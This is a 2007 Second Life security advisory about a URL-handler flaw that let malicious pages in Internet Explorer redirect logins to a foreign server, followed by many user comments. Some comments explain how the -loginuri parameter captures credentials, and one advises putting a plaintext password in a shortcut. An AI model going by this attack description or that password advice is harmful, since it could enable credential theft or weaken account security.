[RESOLVED] Second Life URL Handler Exploit

Note:  This was resolved on the Public Issue Tracker, but never closed on the blog until now.Our apologies for any concern this untidy loose end may have caused. — teeple, 28 Mar 2008.

Due to a URL handler vulnerability, we advise not browsing unknown websites with Internet Explorer. Do not click on ‘secondlife://’ urls on web pages with Internet Explorer or Internet Explorer based browsers. If Second Life starts without your intervention, please change your password on the secondlife.com site immediately.To prevent this exploit prior to an official fix, un-check ‘Remember password’ in the login screen of the Second Life client and never log in unless you manually started Second Life yourself.Second Life is configured to handle ‘secondlife://’ protocol urls. Internet Explorer, and browsers based on Internet Explorer, copy all information from a src or href attribute to launch the SecondLife application. Using this, a malicious website can specify an iframe or anchor tag which redirects login through a server not under Linden Lab control.We have a client side fix for this undergoing Quality Assurance. We expect to deploy the new 1.18.2.1 client this week and make it a required upgrade. Before the official client is available, the patch will be submitted to the sldev mailing list in the hopes that the open source developers can assist in making sure this unusually short turnaround from development to release is of high quality.Firefox does not exhibit this behavior, and is not a vulnerable configuration on Windows.Known affected configuration: Second Life 1.18.2.0 and earlier on Windows.Mac: not vulnerableLinux: not vulnerableAnother Workaround:You can remove the association for the secondlife:// protocol until we release a fixed client by deleting the registry entry. This requires manual editing of your windows registry, and is not for the faint of heart, and there is no implied or expressed warranty on following these instructions. However, it worked for me. Do the following at your own risk:Run the ‘regedit’ program by clicking on the Start menu, clicking on ‘Run…’, entering regedit in the ‘Open:’ combo-box, and finally clicking ‘OK’. Find HKEY_CLASSES_ROOTsecondlifeshellopencommand in the registry editor. Right click on the ‘Default’ value in the rightmost pane and select delete. At the confirmation alert box, click ‘Yes’ and close regedit.The next time you install Second Life, the registry entry will be restored, so this is only a temporary workaround.

This entry was posted in Security. Bookmark the permalink.

101 Responses to [RESOLVED] Second Life URL Handler Exploit

  1. Lex Neva says:

    Some of us have chosen to stick with a pre-voice viewer for a few more major releases until all of the bugs and undesirable interface changes have been ironed out. There’s a community of users surrounding Nicholaz Beresford’s “Old School” viewer, which is based on 1.18.0.6 and includes a lot of bugfixes.

    I totally understand the need to get this exploit fix out ASAP, but I’m a bit upset that I’m going to be forced to switch to a voice viewer. Is it possible to make a 1.18.0.7 and a 1.18.2.1, both with this fix, and both mandatory? In other words, any viewer before 1.18.0.7 can’t log in, and any viewer before 1.18.2.1 can’t as well. I know I, for one, would appreciate this.

  2. Pol McLaglen says:

    Thank you for alerting us all to this exploit and for your quick action against it.

    Fortunately for me I use Firefox as my browser, as I do not trust Microsoft secondary software as far as I can spit upwind (hence my refusal to upgrade to Vista).

    Thanks again guys.

    Pol.

  3. Lex, Nicholaz has fudged version numbers before to avoid the optional update messages. Knowing him he might have a fix live before the lab. 😉

  4. red Dutton says:

    good thing i switched to Firefox since i had to may pop up and Hacks thru it :))
    red Dutton really like Firefox now
    and hits the final delete on IE

    red Dutton can relax and brows with ease knowing Firefox is safe (for now and hopefuly forever :))

  5. Mel says:

    SL is being extremely glitchy at the moment. My sim has crashed me 3 times in the last 15 min.. including a need to reboot the computer.
    I can’t move in there.

    Also.. could you take this information and put it in a way that someone without the computer vocabulary understands? Tell me what I should do.. not do.. in simple terms?

    Thanks

  6. Mel says:

    Does this mean we should not use our old method of getting into SL and that our short-cut icons are not to be used?

    Also.. why the new TOS? Could someone summarize what has changed in it?

  7. Do you think you can explain the exploit in a little more detail for curious minds? =^.^=

  8. RobbyRacoon says:

    The text above warns against clicking on “http://secondlife” protocol urls, but kind of glosses over the fact that clicking such a link is not necessary for the exploit to work, since the exploit makes use of an IFRAME element that automatically “fires” off the link.

    But they did at least say that if the Second Life client starts up automatically, you should be concerned. I wonder, though…. How many people browse while the SL client is still running? I do, and I know several others that do. In such a case, wouldn’t they just get an unexpected map popup? Or would they even get that?

  9. Udge Watanabe says:

    Mel, you may not have seen that normal websites can have links to places in Second Life. This warning is about a way of maliciously redirecting such links. If you don’t use Windows, and if you do use Windows but not the Microsoft Internet Explorer, it doesn’t affect you.

    If you do use Internet Explorer, do NOT click on anylink on the Web that claims to be sending you to Second Life, until this promised upgrade is ready and you’ve installed. The start page will tell you when this is ready.

  10. SL Lykin says:

    I’d class myself as a n00b, so I’m damn glad I run the Linux version and it seems stable to me.

  11. Jabath Steuart says:

    Yeah, in case you hadn’t heard, IE still sucks at security. I wish people would stop using it, and I really wish developers would stop embedding it.

    And thank god for Nicholaz, I couldn’t use the horrible voice viewer UI if it wasn’t for him.

  12. TigroSpottystripes Katsu says:

    hey, what about releasing an optional (nd explicitly unstable) client as well a small program or somthing to unregister the dangerous protocols while a new stable viewer with the fix don’t comes out?

  13. Robaato says:

    More technical details of the explot at http://www.gnucitizen.org/blog/ie-pwns-secondlife

  14. Ameshin: More details (and link to what the exploit does specifically) are on my blog or on http://www.secondlifeinsider.com

    Lex: I’m sure there will be a way to keep Old School working 🙂

  15. Johnny Rambler says:

    Originally posted on the Second Citizen forums by Adam Zaius:

    You can disable it in the registry by deleting the URL handler for the secondlife:// protocol – it’s located in HKEY_CLASSES_ROOT\secondlife\shell\open\command — this is basically poor login arguments handling by LL – it should be ignoring everything after the -url argument.

    This may be a good work around until LL can figure out how to not use the -autologin argument. Expect a security update soon.

  16. Tamara says:

    Nobody wants voice, so you force it on us. Well done!!!

  17. Midnight Paragon says:

    Just remove the entry from the registry.

    Go to HKEY_LOCAL_MACHINE -> SOFTWARE -> Classes and scroll down to “secondlife” and delete it. You can also export the key if you want to add it back in later. After this, SL will not open from the secondlife:// protocol.

  18. Midnight Paragon says:

    Ops forgot.

    Another thing you can do it temporarily add secondlife:// to the restricted sites list in IE and then it will prompt you before opening SL each time.

  19. Missy Malaprop says:

    I don’t get all the anti voice stuff or what it has to do with anything. The UI on the current viewer (w/voice) is fantastic, much better than the old one, and you can still have voice disabled… Is all the bickering just people who don’t like the UI changes that came with it? If your res is so low that the communicate window (which can be much smaller than older versions) is still too big, you need to get a real computer and not run in super low res like 800×600 and below… but even scaling mine down to 800×600 its still ok. I think the replies here need to be more about the security vulnerability and not about voice… they aren’t taking it back out.

  20. “we advise not browsing unknown websites with Internet Explorer”

    Personally, I advise not browsing -anything- with Internet Explorer. In fact, I advise against using Microsoft software in its entirety.
    If it’s not stability you want, at least do it for security!

  21. Listeel says:

    ‘Using this, a malicious website can specify an iframe or anchor tag which redirects login through a server not under Linden Lab control.’

    Uh, I’ve heard of a method of renting your own server and forcing the client to go to it, ie. getting your own grid.

    Could this update be a disguise for ‘fixing’ that exploit?

    Meh, who knows…

    (I know absolutely nothing about how to do it, and have only heard it discussed, so LL don’t sue me =P )

  22. The XO says:

    Oh look…….

    Known affected configuration: Second Life 1.18.2.0 and earlier on Windows.
    Mac: not vulnerable
    Linux: not vulnerable

    Good job I’m running Ubuntu Linux 🙂 Shame the Linux client isn’t given the same dedication as the Windows one… oh well… enjoy your SLURLS…..

  23. Creem says:

    For once I’m glad that the Linux SL client has absolutely no built-in support for the secondlife:// handler! Now I’m just waiting for a vulnerability in the voice client code, so that I can feel glad about the Linux client not supporting that either! =P

  24. Jamie David says:

    What is very concerning is that this exploit has been there for such a long time. Since the beginning of SLURL. Not somthing new just recently found out that is all.

  25. Jessica Hultcrantz says:

    LOL

    Gold old trurtworthy M$oft has made it AGAIN 🙂

    Gees, use Firefox and you can still have the good old voicefree viewer installed…

    Or get a real computer, mac or linux based. Then we can talk security 🙂

  26. Atashi Toshihiko says:

    Yay Macintosh 🙂 For what it’s worth though I never have ‘remember password’ checked anyhow. The only thing that beats having a stable solid computer, is having a stable solid computer *and* being security consious. 🙂

    As far as the ‘communicate’ window goes… it’s an eyesore. I want Friends and Groups and IMs as separate floaters like they used to be. Don’t understand why they all had to be rolled up into one big ugly box.

    Cheers!

  27. Jessica Elytis says:

    I want to echo #1’s post.

    Can we please have a Non-Voice viewer as well? Preferably without the new Communicate UI.

    Thanks
    ~Jessy

  28. Farallon Greyskin says:

    It is well kinown that LL has a personal hatred of IE.

    I some times wonder why they bother with a Windows client at all. But the original reporter confirmed that it DID happen with Firefox on Windows as well.

    Can you confirm that you have REconfimed that it does not?

    And again this is far less that totally an IE/Microsoft exploit than it is a Second Life expoint for not checking for bad input data 😦

    How about taking atleast 50% f the blame here as it takes two totango with this expoit!

    And mac secure? OMG, Mac has had more security vulns in the last 2 years than anything else! You just never hear about them becuase Apple isn;t as “fun” to bash.

    Mac, Windows and Linux are ROUTINELY eploited. Anyone that thinks their platform is “secure” is more likely to get hit than anyone else.

  29. Prodigal Maeterlinck says:

    Firefox actually is vulnerable under this, but not as vulnerable, because at least it will warn you that an application is opening and prompt you to permit it. In that case it’d be user error or erroneous user that’s exploited.

  30. Relentless Roux says:

    my first comment in the comments section:
    Yet another reason to get a MAC!

  31. mimi says:

    “If your res is so low that the communicate window (which can be much smaller than older versions) is still too big, you need to get a real computer and not run in super low res like 800×600 and below… but even scaling mine down to 800×600 its still ok. I think the replies here need to be more about the security vulnerability and not about voice… they aren’t taking it back out.”

    thr problems with the new screen arent all about the size. Why are the groups and friend list stuck together?

  32. Athena Whizenhunt says:

    The word exploit is bothersome to me, I run IE explorer because I am not really a computer person and it came with the package. I also would like more “plain language” about what this is and means.
    Are there any other unusual signs that I should be aware of? I watch what my computer does and am generally paranoid about it, so I might notice something happening, also if exploit means someone can look into mu computer or something it doesn’t bother me as much as someone putting something in my stuff to crash or otherwise grieve me, more plain old details would work for me, I am good at understanding things , I just don’t know technical terminology.

  33. Voice:
    We will investigate making a special channel to keep the 1.18.0 branch alive with security patches.

    Things to look for:
    If Second Life is running and someone activates the url handler, the map will open unexpectedly but your login information is not compromised. If Second Life opens unexpectedly, then it is likely that someone is attempting to exploit this vulnerability.

    Firefox:
    I have been unable to reproduce this problem with firefox. Firefox takes everything in the src attribute and url-encodes it so that it appears as one parameter to the Second Life application.

  34. Don Misfit says:

    As far as I know, if you simply un-check the “Remember password” box on the SL login screen, this “exploit” is avoided (with all browsers on all platforms).

    Telling *any* software to record and auto-send your username/password combination is risky to begin with…

    ‘course, I may be wrong about this, but I don’t think so 🙂

  35. Schizm Neutra says:

    Thank you Mel! I am tech-challenged and do NOT understand what the hell this is all about! Isn’t it GREAT that all this happens AFTER my tier and membership fees are paid? NOW I prolly won’t be able to be on SL for the next few weeks, until I UNDERSTAND or someone ‘SPLAINS to me what is going ON!

    Pretend I’m from another PLANET, K? Tell me in KINDERGARTEN terms what I need to know…you guys ALWAYS do this to us…and if this diatribe offends the technologically astute…oh well, money is dumb, it goes to those who know what’s going on, and those who DON’T! Those who DON’T get to spend theirs toooo, K? Thank what ever God you believe in that we DO spend it here, cause guess what?

    It makes these ‘updates’ possible, K? Just EXPLAIN it to me…IM me if yu must, but let me know what’s going onnnnn!

  36. Slartibartfast Magicthise says:

    I just have to wonder – how many times do people need to be hit in the head with a two-by-four before they move away from the Micro$oft lumberyard?

    Face it, M$ is the short-bus of the digital spectrum. Don’t let all the riders fool ya. Just because all your friends wear bike helmets and drink juice boxes doesn’t mean you have to too.

  37. Could be this problem linked to a redirecting I had in these days when Sl gave me some notecard with a webpage to browser whith IE7.0? In my processing of the task Manager I saw a “not well idenntificated2 process I neve saw named about “LuCallback….proxy..”.?
    Ty for reply
    E.P.

  38. Missy Malaprop says:

    not really true about “more” vulnerabilities in the last two years. True if you look at just the number, its bigger than MS Windows, but it includes much much more wide range of things than MS Windows numbers do, as the Apple numbers cover much more than just the OS.

    If going back to the car analogies, its like MS saying they had less security problems than Apple, yet they are only looking at the engine, where Apple is looking at the whole car.

  39. Ann Otoole says:

    ummm… how can someone on a different computer cause secondlife to unexpectedly open itself on your computer? that sounds really odd to me. is there something more to this exploit? is someone running a botnet engineered to infect computers with secondlife installed?

    many people were recommending use of this protocol as a workaround to the slurl and llMapDestination defect that causes random vector data to be used on first activation. Will you be fixing this defect now?
    http://jira.secondlife.com/browse/VWR-2060

  40. Missy Malaprop says:

    “thr problems with the new screen arent all about the size. Why are the groups and friend list stuck together?”

    that is sort of true, it would be nice to be able to tear away the friends list to keep it open and separate. I don’t mind it being together with group list, because there is really no point and ever leaving the group list open, but it would be nice to have the friends list open while still having the “Near Me” tab visible.

  41. Blinders Off says:

    Lex Neva wrote: “I totally understand the need to get this exploit fix out ASAP, but I’m a bit upset that I’m going to be forced to switch to a voice viewer.”

    I fully agree with this Lex. The 1.18.2 viewer is buggy as can be, with the result that I went back to 1.18– at which point the bugs disappeared. I hate the new interface (it’s much more difficult to use… where is the FRIENDS box, anyway?). I appreciate this patch is necessary, but like you, what good is the “you don’t have to upgrade unless you want to” if every other release, they’re forcing us to upgrade?

    Just more LL corporate poo….

  42. Melanie Milland says:

    Yes, please keep 1.18.0 alive! I’m on Linux – no voice yet, and being saddled with that atrocious UI _and_ not having the “benefit” of voice for it would be really bad.

    Unfortunately, there is no Linux build of the Nicholaz viewer that I know of.

  43. Erinsye Planer says:

    Hmmm, BEFORE you start praising FIREFOX, there are the SAME security issues with firefox as with ie. In fact more. Try picking up a copy of PC or Networking soemtime. And YES this exploit affects firefox too.
    Oh and those of you that think a mac is less prone to exploits or viruses then a pc, need to wake up. There may be less viruses that target macs but they DO exist and they are FAR more devistating. oh, and Macs like ALL apple products are notoriously easy to hack. Really people. Educate yourselves before you open your traps to praise hings you clearly have ZERO knowledge on.

  44. Henri Beauchamp says:

    PLEASE, DO NOT MAKE A _REQUIRED_ UPDATE !!!

    Many people are still using v1.18.0.6, because they hate the new UI you introduced in the voice viewers…

    I also use v1.18.0.6 myself, despite the patches I made to restore part of the old UI in v1.18.1 and later, because sometimes, it’s the only way to do things that the newer viewers can’t do (many interesting features were alas removed from the voice viewers, like “ALT shows physical, for example) or where they got bugs (case of the “Update” button in the classifieds, which doesn’t show after a TP point update, for example).

    Plus, Linux and MAC users are not even affected by the exploit…

  45. Soo Novi says:

    Thank you for looking into making a voice-less viewer available with this mandatory fix. I have yet to see a voice client viewer that enables me to fly my avatars and saddles well, and on a lighter note – I don’t like the UI on the voice client either. I could live with the UI (if I had to) but I can’t function without my dragons on SL. If my dragons can’t fly I have no reason to log in.

  46. Erinsye Planer says:

    Oh about the interface, I find 1.18 much buggier then 1.81, the voice can be turned off and the UI is 1000 times mroe stable. as for the friends box, if renaming it communicate confuses you, shut off your computer and get out of second life. Theres also the entire support website, the in game help, orientation island, etc that ALL teach you how to use the client. Seriously if you cant figure out how to use 1.18.1 or 1.18.2 get off Second Life becuase its obviously beyond your comprehension.

  47. Tamara says:

    THANKYOU PHOENIX!!!! So good to see someone is listening for once!

  48. Cocomo Munro says:

    hehe i use firefox & have a mac… guess I’m all good then? XD

  49. Sue Saintlouis says:

    First, like some others have said, let’s have the explanation of the problem in English…plain English!

    Second, let’s keep on topic.

    Third, how about a little respect? Why make the IE users, or Mac users, or anybody feel like they’re stupid?

  50. Joeymacaroni Vella says:

    I’ve been censored 4 times now on these blogs so I’ll see if this goes through. You guys at LL are the best, you’re smart and no one can surpass your great support. I love SL and all the Lindens. You are flawless. Great job!

  51. Sedary Raymaker says:

    we advise not browsing unknown websites with Internet Explorer.

    People still do that?!

  52. Vincent Nacon says:

    One point to FireFox and Zero point to IE.

    😉

  53. Chaz Longstaff says:

    >> Daedalus Young Says: Personally, I advise not browsing -anything- with Internet Explorer. In fact, I advise against using Microsoft software in its entirety. If it’s not stability you want, at least do it for security!

    I second that! I also steer clear out of Outlook — it’s a virus magnet.

  54. WADE1 Jya says:

    hehe i love it.

    Mac: Not Vulnerable

    Macs are awesome 🙂

  55. Wallaby says:

    I too appear to be technonlogically retarded. What in the bloody fruits does this mean!? Does this have anything to do with the fact that my account appears to have been completely corrupted within the past 24 hours. I mean, I can’t do anything! My avatar is stuck on child mode, I can’t teleport, I can’t access my inventory, I can’t even communicate with anyone. I do use IE, and up to this point, I had no idea the security sucked. Perhaps someone could tell me if the issues I have explained are attributed to this so called EXPLOITATION.

  56. Noctorne Nagy says:

    To those that have problems with the voice viewer:

    You can tear of the near me tab by hitting the little box in the corner and it will be exactly as it was pre voice.

  57. johnny says:

    hmmmm if someone did manage to hack your account they wouldnt be able to move anyway or take your cash i want to know wot your doing about your hardware it cant cope with the workload instead of complicating sl with fancy features fix the sl we have now months of lag and its getting worse you throw diff suggestions at what the cause may be thing is from 4pm-4am uk time you cant move thats every day ,thats when it hits 30-40k traffic it is never going to get better and you bill me 900$ a month for it great

  58. The communicate window I’ve acutally gotten used to…so its no big deal to me. The friends list being in the IM window is quite annoying, however, its not the worst thing thats happened to Second Life.

    Missy Malaprop Says:
    … but it would be nice to have the friends list open while still having the “Near Me” tab visible….

    Just click the small square in the corner that detatches Near Me from that window and close it. It then functions like the old History window used to, with only your friends / groups tacked onto the IM window.

  59. Sorry for double posting…but I forgot to say something in the last post. What about Safari 3 for Windows?

  60. Revolution Perenti says:

    SO Linux ^^ Microsoft aways had so many problems with IE why when ever i do use Windows its Firefox 😀

    Rev 🙂

  61. Mel says:

    Things to look for:
    If Second Life is running and someone activates the url handler, the map will open unexpectedly but your login information is not compromised. If Second Life opens unexpectedly, then it is likely that someone is attempting to exploit this vulnerability.

    ok…
    a) What is a url handler?
    Is it where you type in http:….
    Is the affected one different than the one you get by going to the SL website and signing up?
    Is it different than the one that forms as an icon so you dont have to sign in through http… every time?
    b) what map.. the map that shows the grid?

    Several of us do not have the technical knowledge to understand this vocabulary…altho it is always a challenge to understand it. Some definitions, please.

    When I tried to get on earlier when I kept getting frozen, logged out, etc etc.. I encountered a message about my agent being in another region.. what was that about?

  62. Quint says:

    This sounds very much like a bug which was fixed in the 2.0.0.6 version of Firefox (the most recent version, although 2.0.0.7 looks to be coming out very soon) If you are using an earlier version, you MAY still be vulnerable to this exploit, though I can’t confirm this for certain.

  63. Shadowen Silvera says:

    @1 I echo these sentiments exactly. Please find some way to not force us to upgrade to the unwieldy voice interface.

  64. Darkscorp Decatur says:

    Well,all I can say is Yay for FF!

  65. Damanios says:

    Quick ‘techno-challenged’ expo of the issue:

    1. What is a protocol-handler?
    Remember a website starts with http://. this way the browser knows to the use http protocol (webpage) to handle the url (thing in top of your browser. The browser itself handles http protocols, as it’s made to display webpages. Just like http://, IE and firefox allow you to install ‘external protocol handlers’.
    This usually means the resulting url is being handed to a different application to process. Secondlife installs such a handler to handle ‘secondlife://’ urls. So any url starting with ‘secondlife://’ will be automatically handed over by your browser to the secondlife client. Which tries to login to the grid then.

    Besides typing a url, it can be directly embedded in a website (all the links on a webpage are urls too). So you can put that ‘secondlife://’ url as a link in a webpage.
    The exploit uses this.

    But for it to actually compromise your pw, it uses a second part of the secondlife viewer: The ‘command parameters’. Extra commands you can type after the secondlife command, which allows you to configure stuff during startup of the client. like ‘-multiple’ to allow multiple clients open.

    2. The command parameter ‘-loginuri’:
    The -loginuri command makes the secondlife viewer send a message containing your name and (an encoded) pw to an external server, which is then meant to authenticate you so you have access to the SL grid. Normally it isn’t used, as SL will connect to the normal LL login servers to authenticate, but it’s provided to login to different grids (like opensim or beta grids etc.). In this case it’s simply used to grab the name/pw in the message and store them so people can use them to log in to your account.
    Although the password is encrypted, it’s being accepted by the ‘normal’ LL login servers in exactly the same manner, so the encryption doesn’t matter in this case.

  66. la le lu says:

    get linux. it also can ogg theora video streams and other quicktime ignored live stream formats. stable and less vulnurable for explorer exploits. i really hope that microsoft get broke while they pay more and more penalties on court acts.

    haha, US$ 690mio, not as shares in real money! more!!!!

  67. Tracey Humphreys says:

    What! There are neathandrals out there still using IE? Get real, suckers… Firefox!

  68. Ron Crimson says:

    @ 46: Ron Crimson gives Erinsye a BIG hug.

    😀

    THANK YOU for speaking my mind!

  69. Missy Malaprop says:

    @43, Erinsye Planer …

    well good to know someone out there knows everything….

    **rolls eyes**

  70. Ravanne Sullivan says:

    What about those of us who do not use and do not wish to use the voice-enabled viewer? The voice-enabled viewer makes changes to the user interface that many of us do not want and adds a feature that we may not want or be able to use.

  71. Schizm Neutra says:

    Slartibartfast Magicthise Says

    IF I had the MONEY and the TECHNICAL help (read money) I tooo would be ‘moving away’ from an operating system that does strange and weird things to my computer, my life and my time…but…I’M POOR, sooo I’m STUCK with Microsoft and it’s attendent idoicy. THANKX for your understanding oh wise one! 😦

  72. cardinalsin says:

    No need to switch to a silly Mac. Just use Firefox, yo. :3

  73. Montana Corleone says:

    Yes please, I want to keep my Mac pre-voice viewer, I do not want a mandatory update to that horrid interface. Please in future releases, have an option that if you don’t want to use voice, you can go to old style comms boxes.

    If it doesn’t affect Mac, as usual, why have a mandatory?

  74. FD Spark says:

    Um my SL browser never remembers my password when I login in world. Are they referring to something else?
    Personally I seldomly use i.e myself

  75. Archer Braun says:

    Yet another reason to be glad I have a Mac. Now…if SL could only plug the memory leaks that cause the mac client to do silly things like crash at logout, chew up CPU resources at insane levels, and generally act like a glue-sniffing teenager tweaking on a shot of crystal meth…then I’d be truly happy.
    But no…I think they’ll be introducing the amazing new outsourced “Smell” component.

    I can’t wait.

    Really.

  76. Yet more proof that IE blows teh goatse. Thanks for the warning LL, I’ll be sure to not use IE more than I do now. >)

  77. Cocoanut Koala says:

    What Schizm said.

    These things are very confusing to non-techy types like me. I’m surprised anybody like me still plays,what with these confusing warnings, and little information that is understandable to people like me.

    If you would say – HERE’S WHAT YOU MUST DO, RIGHT NOW – that would help. Apparently make sure the “remember password” is unchecked is the only thing I’ve gotten out of this scary message.

    But is that enough?

    I don’t know what a URL handler is, and I have no idea how I could open SL to log into it without doing it manually. How on earth do you manage that?

    It’s nice several posters in this thread laugh at everyone using IE, but – surprise, surprise – most of the world has not gotten the inside dope you technical maestros apparently have! I have both Firefox and I.E., and now I don’t know if I’m supposed to get rid of I.E. altogether or what.

    I pretty much have no idea what this whole blog entry means, except that I should be even more wary of logging onto SL than ever.

    Is my guess right? – that if I uncheck “remember password” I should be okay?

    Or is there something else I’m supposed to do?

    And finally, as several other posters have said – yes, please make the non-voice version always available. Before I got my new computer, it was virtually impossible to use. With my new computer, it just slows me down some. Either way, I’d rather not use it unless I have to for a specific event. (Plus the box is much less convenient than the old way, and takes up too much of the screen.)

    coco

  78. U M says:

    Strange how they are telling people to upgrade because of the breakin. Those taht did not want it now are forced to do so. Why? Read between the lines……… So So typical!!!!!!!!!!!!!

  79. Sweet says:

    they closed the age verify blog but anyone wanting to see about the merge of teen and adult grid check this out http://slcreativity.org/blog/?p=32

    read down to the bottom part of the interview or u can watch the poor quality on the video
    its coming one grid =/

  80. Diomedes Nikolaidis says:

    Get rid of IE and Firefox both. Use the best of all browsers – Opera.

  81. U M says:

    44 Henri Beauchamp Says:

    September 18th, 2007 at 1:45 PM PDT
    PLEASE, DO NOT MAKE A _REQUIRED_ UPDATE !!!

    Many people are still using v1.18.0.6, because they hate the new UI you introduced in the voice viewers…”

    Its a great way to get everyone to the one viewer right? Gesh……… Everyone must have the voice the viewer.

  82. Missy Malaprop says:

    One Viewer to rule them all, One Viewer to find them, One Viewer to bring them all and in the darkness bind them in the Land of Second Life where the Lindens lie.

  83. Dana Hickman says:

    I fully agree with #79. I DO NOT want that lame, resource hogging voice viewer… ever! Keep your exploit fix, thank you, and let me keep my pre-voice viewer.

  84. taff nouvelle says:

    Did anyone else notice that the TOS now says you are now not allowed to use third party viewers to access the SL grid. So much for open source.
    Also if you lose anything from your inventory, thats OK, LL are allowed to delete anything because they now own it all. everything you make or buy is owned by LL. hmmm

  85. I would strenuously recommend this “Voice: We will investigate making a special channel to keep the 1.18.0 branch alive with security patches.” the problem is not with voice itself I need to keep my IM and my chat history open but the voice viewer makes the minimum height of the IM window 1/4 of my screen(1600×1200 resolution) that is to put it bluntly unusable, a manditory shift to the voice viewer’s UI will cripple my ability to function in world.

  86. Marv Rayner says:

    The most troublesome aspect of this to me is making 1.18.2.0 manditory. I have no problems with voice and will probably use it in the future, but I cannot stand the thought of having to deal with the abomination that is the Communicate UI. Despite it’s name, it is much clunkier than the previous IM, Friends, and Group windows; it actually makes communicating more difficult than before, as well as eating a large chunk of valuable screen real estate. Please give those of us who have experienced the Communicate UI and refused to upgrade to it a way around it. And please allow those of us who have upgraded and hate it (my backup computer) a way to install a version without it.

  87. Chaos Mohr says:

    “Firefox actually is vulnerable under this, but not as vulnerable, because at least it will warn you that an application is opening and prompt you to permit it. In that case it’d be user error or erroneous user that’s exploited.”

    Hmmm IE7 in Vista does the same thing, it warns you that an application is opening and prompts you to permit it – it all comes down to running security in your browsers, no matter what the browser or the platform – if you you old technology, or disregard common security precautions, you will leave yourself vulnerable.

    Now. while they have said that if you are already have SL up and running on your Windows machine, this vulnerability will not pass your encrypted data – what if the command switch to run multiple copies of SL is passed?

  88. mimi says:

    What kind of patches have you made henri? To add the old viewer in a new secondlife?

    It sounds very interesting!

    if you do please sell them and we will buy them!

  89. Tod69 Talamasca says:

    I read about this exploit yesterday or earlier today- I forget.

    Link: http://www.heise-security.co.uk/news/96163

  90. Sierra says:

    The vulnerability in the URL handlers like this has been know for a few weeks now….where you testing it to see if SecondLife was also vulnerable these last few weeks?

  91. U M says:

    @ 89 everyone knew this woud happen. Many caleld for safe measures. But LL didnt pat any attention until someone causes this problem to be noticed. A little too late as always don`t you think.

  92. void singer says:

    ::desperately misses the old ui for multiple reasons, new is too blocky, im now tied to new oversized communicate, loss of “alt shows…, etc::

    for those that still want the old saved pw function, but not the vunerability try modifing a shortcut to seccondlife to the following:

    “C:\Program Files\SecondLife\SecondLife.exe” -login first last password

    change first last and password to your own info
    this will connect you automatically to whatever your location is set to skipping the info page. IF YOU WANT THE INFO PAGE, DON’T THIS!

    if you hate that it redetects your hardware EVERY time add -noprobe before -login (by itself this won’t cause you to skip the info page)

    if you want to make it log into a specific location add -url secondlife://region/x/y/z to the end

    replace region and xyz with the sim name and coordinates. you can use this w/o the others to set your login location and still keep the info page

    example:

    “C:\Program Files\SecondLife\SecondLife.exe” -noprobe -login your name password -url secondlife://ahern/128/128/0

    IMPORTANT NOTE: anyone that click on the shorcut can see you password if you specify it, so you probably shouldn’t do this if you share your destop with another user. dunno what the equivalent for Mac users is, linux users can obviously figure out the difference

    – Void

  93. Sofia Westwick says:

    Please do keep a viewer alive for us who can’t use Voice for hearing reasons or us who just don’t want to bother with it. I my self am using the 1.18.0.6 client. and I would like to keep using this style I prefer the 1.18.0.6 interface and none voice over the other viewers/client interfaces. I do not want to be forced to use the voice style update and interface

    All of us who use the 1.18.0.6 style would be very greatful for a version like this when the the required upgrade is out.

  94. Jabath Steuart says:

    For those who don’t understand the jargon, here is the exploit:

    You go to a web page in Internet Explorer with SL not running, the webpage has some nasty code in it that launches SL (through what they call a url handler) and tries to log in. BUT the code tells SL to log in to the nasty cracker’s server, not the LL server. If you have the “remember password” box checked on the SL login screen, your password is sent to the cracker’s server. Your login will then fail.

    If SL IS running when you go to the bad web page, it will not try to log in, and it won’t send your password. The map might pop up though.

    If you are using Firefox and not IE, the same thing happens, except firefox does the urlhandler thing properly, and SL wont send your password to the cracker.

    Q: Who’s fault is this? LL and Microsoft
    Q: What should I do about it?
    A: Minimum: Uncheck the Remember Password box and wait for the update.
    Reasonable: Set IE security settings to high and never use it again. Install Firefox or Opera browser and set it to be your default browser. Change your SL password (and all your other passwords) bi-monthly or better. Use a password of at least 8 characters using lowercase and uppercase letters, numbers and at least one symbol

    http://www.securitystats.com/tools/password.php

  95. Jabath Steuart says:

    I posted the link above so you could read the tips, if you want to use the password strength meter, please follow this advice:

    “Please note that although we will not store the password you enter, it’s never a good idea to send your password to someone you don’t know. Instead, we recommend testing a password which is *similar* to one you might use.”

  96. Unmitigated Gall says:

    TAMARA,

    MANY OF US DO WANT VOICE. VERY SIMPLE, YOU DONT WANT IT, DONT ACTIVATE IT? SO DAM SIMPLE.

  97. Unmitigated Gall says:

    Strange that all calls using the “secondlife//” http reqest are now considered someone trying to exploit the vulnerability. I have used that call for years to link people into the game from email. All that has changed is you have become aware that someone is now using a hack to get user info. The only change you should make is removal of the “Remember Password” box. Issue solved, all platforms and viewers.

  98. About the voice viewer problem: you can simply Edit the Preferences and turn off Voice Chat. There is a checkbox on the Voice Chat tab. The new viewer still has a slightly different chat window, but at least you will now not have voice.

  99. Sofia Westwick says:

    Its not just about voice its abotu the interface. The voice one is very differnet then 1.18.0.6. and alot of us do not want to be stuck with the new interface.

    So we will be happy with one same style as 1.18.0.6

  100. Re: Firefox vulnerability debate.

    http://www.mozilla.org/security/announce/2007/mfsa2007-27.html

    This issue can only occur for firefox users who don’t update and are running prior to Firefox 2.0.0.6 current version is Firefox 2.0.0.7.

Comments are closed.